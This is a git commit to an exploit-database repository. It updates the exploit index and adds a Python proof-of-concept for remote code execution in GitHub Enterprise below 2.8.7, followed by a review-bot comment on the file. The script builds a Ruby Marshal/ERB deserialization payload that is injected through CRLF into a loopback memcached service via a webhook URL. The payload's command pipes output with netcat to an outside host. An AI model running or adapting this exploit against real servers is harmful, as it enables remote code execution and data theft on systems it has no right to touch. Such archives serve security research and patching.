DB: 2017-07-30
1 new exploits vBulletin 4.2.3 - 'ForumRunner' SQL Injection vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection GitHub Enterprise < 2.8.7 - Remote Code Execution
parent
fb7bed6364
commit
25e79a8750
2 changed files with 32 additions and 1 deletions
|
@ -37434,7 +37434,7 @@ id,file,description,date,author,platform,type,port
|
|||
40746,platforms/php/webapps/40746.php,"e107 CMS 2.1.2 - Privilege Escalation",2016-11-09,"Kacper Szurek",php,webapps,0
|
||||
40749,platforms/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80
|
||||
40750,platforms/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps,0
|
||||
40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
|
||||
40751,platforms/php/webapps/40751.txt,"vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
|
||||
40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
|
||||
40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
|
||||
40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0
|
||||
|
@ -37914,6 +37914,7 @@ id,file,description,date,author,platform,type,port
|
|||
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
|
||||
42392,platforms/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,multiple,webapps,0
|
||||
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
|
||||
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
|
||||
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
|
||||
|
|
|
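--- a/platforms/multiple/webapps/42392.py
+++ b/platforms/multiple/webapps/42392.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python
+from urllib import quote
+
+''' set up the marshal payload from IRB
+code = "`id | nc orange.tw 12345`"
+p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult"
+'''
+marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'
+
+payload = [
+'',
+'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code),
+marshal_code,
+'',
+''
+]
+
+payload = map(quote, payload)
+url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/'
+
+print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org"
+print '-'*10 + '\n'
+print url + '%0D%0A'.join(payload)
+print '''
+Inserting WebHooks from:
+https://ghe-server/:user/:repo/settings/hooks
+
+Triggering RCE from:
+https://ghe-server/search?q=ggggg&type=Repositories
+'''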
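Review bot: The new file has no header comment saying what it demonstrates or which release closes it; the only context is the commented-out IRB snippet at the top and the banner string near the end. From the visible lines it appears to build a webhook URL whose `url=` parameter points at `127.0.0.1:11211` and carries `%0D%0A`-separated lines beginning with a `set` command, so a header along the lines of `# PoC, GitHub Enterprise < 2.8.7: CRLF injection via webhook URL into the loopback cache service; upgrade to 2.8.7 or later` would tell a reader what to patch. The same header could name what a defender should look for, namely webhook URLs that contain encoded CR/LF or target loopback addresses. It is also worth stating there that the script is Python 2 only (`from urllib import quote`, `print` statements) and only prints a URL rather than sending anything.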